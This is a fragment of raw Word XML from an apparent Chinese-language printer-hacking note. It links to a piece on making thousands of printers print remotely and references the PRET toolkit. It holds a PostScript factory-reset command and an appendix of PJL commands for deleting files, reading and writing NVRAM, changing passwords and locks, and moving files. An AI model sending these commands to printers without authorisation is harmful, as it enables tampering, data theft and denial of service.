          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; /FactoryDefaults </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="444444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; setsystemparams</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C35484">
        <w:t>https://kur0sec.org/print     如何使6000台打印机同时为我打印</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00120F8E" w:rsidRDefault="00120F8E" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00911ED2" w:rsidRDefault="00911ED2" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00C35484" w:rsidRDefault="00C35484" w:rsidP="00DB1AF1"/>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>附录：PJL指令</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t>@PJL FSDELETE NAME = “pathname” [&lt;CR&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">]&lt;LF&gt;                         </w:t>
      </w:r>
      <w:r>
        <w:t>删除文件</w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00F901A2" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t>@PJL FSDOWNLOAD FORMAT:BINAR</w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">Y [SIZE=int] [&lt;CR&gt;]&lt;LF&gt;         </w:t>
      </w:r>
      <w:r>
        <w:t>下载文件到打印机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t>@PJL FSINIT VOLUME = “pathname” [&lt;CR&gt;]&lt;LF&gt;              初始化打印机文件系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL FSMKDIR NAME = “pathname” [&lt;CR&gt;]&lt;LF&gt;                  </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 创建目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00F901A2" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL DINQUIRE CPLOCK              </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">                           </w:t>
      </w:r>
      <w:r>
        <w:t>检查控制面板状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL DINQUIRE PASSWORD        </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 检查密码保护状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL JOB PASSWORD = [Number:0 to 65535]                     </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>当前密码保护密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL DEFAULT PASSWORD [Number:0 to 65535]              </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:t>修改保护密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00F901A2" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL DEFAULT CPLOCK = [ON, OFF]                                 </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>控制面板状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET IOBUFFER = [ON, OFF, AUTO]                        </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:t>设置缓冲区</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00F901A2" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET IOSIZE = [10-100]            </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 设置缓存区大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET PCNAME = [String]                                       </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>设置计算机名称</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00F901A2" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET HOLD = [ON, JOB, STORE, PROOF]                       </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t>设置文件保存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t>@PJL SET HOLDKEY = [Number:0000 to</w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve"> 9999]                        </w:t>
      </w:r>
      <w:r>
        <w:t>设置保存文件密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL DEFAULT DISKLOCK = [ON, OFF]                   </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:t>设置硬盘锁定状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET SPOOLTIME                                              </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>设置打印日期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET COPIES                                               </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>设置打印数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET JOBNAME                                        </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">设置打印机文件名称@PJL SET RESOLUTION                                            </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>设置分辨率</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET DRIVERNAME                                            </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 设置驱动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL USTATUS JOB                              </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>输出队列中还未打印任务的状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL COMMENT                                                    </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>添加注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET OUTTRAY                                 </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r>
        <w:t>出纸盘(纸张输出位置)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET ORIENTATION = [PORTRAIT, LANDSCAPE]          </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:t>页面方向</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET DUPLEX = [ON, OFF]                     </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:t>双工模式(双面打印)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET BINDING = [LONGEDGE, SHORTEDGE]              </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>双工模式：短边、长边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL RNVRAM ADDRESS                                  </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:t>读取内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL OPMSG DISPLAY                                      </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>设置打印机离线脱机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL SET SERVICEMODE                                       </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>设置服务模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL WNVRAM ADDRESS                                             </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>写入内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL FSDIRLIST NAME                                            </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>读取目录</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL FSQUERY NAME                                             </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:t>读取文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL FSUPLOAD NAME                                            </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:t>文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB1AF1" w:rsidRPr="00DB1AF1" w:rsidRDefault="00DB1AF1" w:rsidP="00DB1AF1">
      <w:r>
        <w:t xml:space="preserve">@PJL FSDOWNLOAD                                                </w:t>
      </w:r>
      <w:r w:rsidR="00F901A2">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>写入文件</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00DB1AF1" w:rsidRPr="00DB1A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Malgun Gothic Semilight">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="B0000AAF" w:usb1="09DF7CFB" w:usb2="00000012" w:usb3="00000000" w:csb0="003E01BD"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5B3"/>
    <w:rsid w:val="00036BCC"/>
    <w:rsid w:val="00120F8E"/>
    <w:rsid w:val="002C0535"/>
    <w:rsid w:val="005E05B3"/>
    <w:rsid w:val="0068314D"/>
    <w:rsid w:val="00691AEC"/>
    <w:rsid w:val="00813C46"/>
    <w:rsid w:val="00911ED2"/>
    <w:rsid w:val="00915F76"/>
    <w:rsid w:val="0094323D"/>
    <w:rsid w:val="00BD5C10"/>
    <w:rsid w:val="00BF52B5"/>
    <w:rsid w:val="00C35484"/>
    <w:rsid w:val="00DB1AF1"/>
    <w:rsid w:val="00DE5D90"/>
    <w:rsid w:val="00F90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AE873"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF6AB849-C113-471E-8473-52688ADCC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EastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Malgun Gothic Semilight"/>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901A2"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002C0535"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C0535"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C0535"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-selector-tag">
    <w:name w:val="hljs-selector-tag"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C0535"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C0535"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C0535"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C0535"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="002C0535"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-meta">
    <w:name w:val="hljs-meta"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00BF5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4519">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="100690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https://github.com/RUB-NDS/PRET" TargetMode="External"/><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883</Words>
  <Characters>5037</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>41</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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sheepherder</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sheepherder</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-09T11:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-09T14:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>